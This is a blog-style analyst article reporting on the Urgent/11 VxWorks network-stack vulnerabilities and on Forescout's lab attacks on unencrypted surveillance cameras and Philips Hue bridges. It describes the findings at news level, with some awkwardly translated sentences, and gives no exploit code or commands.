Securing Internet of Things (IoT) is the biggest challenge in rolling it out especially in industrial widespread applications where disconnect between operational and informational security posed major threat to industrial IoT security.
Recently we have found that many embedded devices were vulnerable over the Internet and need to redefine code of practice for consumer IoT Security.
In the real-time operating system VxWorks several serious security vulnerabilities have been found in the network stack. Apparently VxWorks does not use any common security mechanisms like ASLR in the standard configuration, so the gaps are easy to exploit.The IT security company Armis has found several serious security vulnerabilities in the real-time operating system VxWorks . VxWorks is used in firewalls, printers, medical devices and industrial equipment. The security holes were baptized Urgent / 11, because there are a total of eleven vulnerabilities.
One of the gaps concerns the IP stack of VxWorks, four more the TCP stack. That’s one of the reasons why the gaps are particularly critical: they can be exploited over the network. An attacker only has to send a manipulated data packet to the systems. This is especially fatal for devices connected directly to the Internet.But even devices that are not directly connected to the Internet and protected by a NAT, may be attacked under certain circumstances. If the devices connect to the outside and an attacker can manipulate this connection, an attack is also possible.
In addition, VxWorks does not appear to use any of the standard mitigation mechanisms used in modern systems, such as memory randomization (ASLR), non-executable memory areas, or stack canaries. Such mechanisms, which are standard in all current operating systems today, make the exploitation of security vulnerabilities often harder or even impossible. Although VxWorks optionally supports such mechanisms, Armis said they were not enabled in any of the tested devices.
The lack of mitigation mechanisms makes it relatively easy to write exploit code for the vulnerabilities. The researchers from Armis show with some examples how they exploit the vulnerabilities. For example, they took over a patient monitor used in hospitals and were able to execute code and read data from the device.
From Windriver, the manufacturer of VxWorks, there is a security advisory and updates. But these must first be passed on to the customers by the manufacturers of the corresponding devices. In addition, many of the affected customers may not even know which operating system is used in the corresponding devices.
VxWorks is used in many devices. Its customers include numerous major electronics groups such as Siemens, Mitsubishi, Samsung, Ricoh and Xerox. Armis researchers also point out that the IP stack called IPNet is not just used by VxWorks. This was purchased by Windriver in 2006 and previously licensed to numerous other manufacturers.
The technical details of the vulnerabilities are published in this whitepaper
Here is another incident of Philips Hue cameras hacked over insecure logs.
Security researchers have managed to send control commands to security cameras and Philips Hue lamps. The devices transmit data and commands by default in an insecure manner.
The security company Forescout has succeeded in a study , several surveillance cameras off or exchange their video stream. Even the smart Philips Hue lighting system outsmarted Forescout’s security researchers. Many devices on the Internet of Things (IoT) use unsafe protocols by default, without any encryption. This allows attackers to read and modify the data transferred, right through to remote control of the devices.
The security researchers bought three surveillance cameras and two Philips Hue lights and set up the devices in their lab. They then attempted to prevent the cameras from taking video images with a DoS (Denial of Service) attack. By default, the cameras used to control and transmit the video data using the insecure Real-Time Transport Protocol (RTP), Real-Time Streaming Protocol (RTSP), and Real-Time Control Protocol (RTCP), so they could send control commands to the network camera and To prevent the connection between the camera and the recorder. Alternatively, the connection could be frozen or interrupted by a flood of RTP packets injected into the video stream. The encrypted variants of the protocols (SRTP, SRTCP), which secure the transmission of data,
In addition to the insecure protocols, Forescout’s attacks are based on the assumption that they already have access to the network where the smart devices are located. This access can be achieved, for example, via a vulnerable device which can be reached via the Internet, via the human vulnerability, for example through a phishing mail or a USB stick with malware, or via a device introduced into the network, such as a Raspberry Pi. states in the study.
Exchange monitoring video
Since the recordings of the surveillance cameras are transmitted un-encrypted, the security researchers were able to record the video material in a first step. Using a control command, they re-initialized the camera and streamed it to another port. On the originally used port they streamed their previously recorded video material, which was received by the network recorder. What really happened in front of the camera was streamed into nothingness. The attacks worked regardless of the manufacturer of all devices that used the unsafe protocols, explain the security researchers.
Using the search engine Shodan they were also able to locate 4.6 million cameras, which were accessible via the insecure RTSP protocol. Most are said to be in China, the US and Brazil.
The smart lights from Philips are connected to the local network via a bridge. With this, the lights can be controlled via the network via an API. The commands are authenticated via a token, but this is also transmitted in plain text – and can be tapped accordingly by an attacker in the network. With the token, the attacker can send commands to the hue lamp and turn them on and off, for example, or flash them at certain intervals. In addition, another user can be added. For this, a physical button on the bridge would actually have to be pressed, but the researchers found that this can also simply be pressed virtually. Also, access to the lamp from the outside can be allowed. An attacker could use this to access the network where the lamp is located via the Internet, according to the study. This could be used for further attacks.
In addition to the insecure protocols, there are often also security holes in the smart devices. Just recently, security researchers showed how easy it is to crack a smart door lock . Previously, Google subsidiary Nest closed a security hole that allowed original owners to continue to access the camera’s images after selling a Nest surveillance camera. At the Chaos Communication Congress, a security expert showed how easy a smart bulb can become a Trojan .
Author Profile
- Amram David
- Amram is a technical analyst and partner at DFI Club Research, a high-tech research and advisory firm .He has over 10 years of technical and business experience with leading high-tech companies including Huawei,Nokia,Ericsson on ICT, Semiconductor, Microelectronics Systems and embedded systems.Amram focuses on the business critical points where new technologies drive innovations.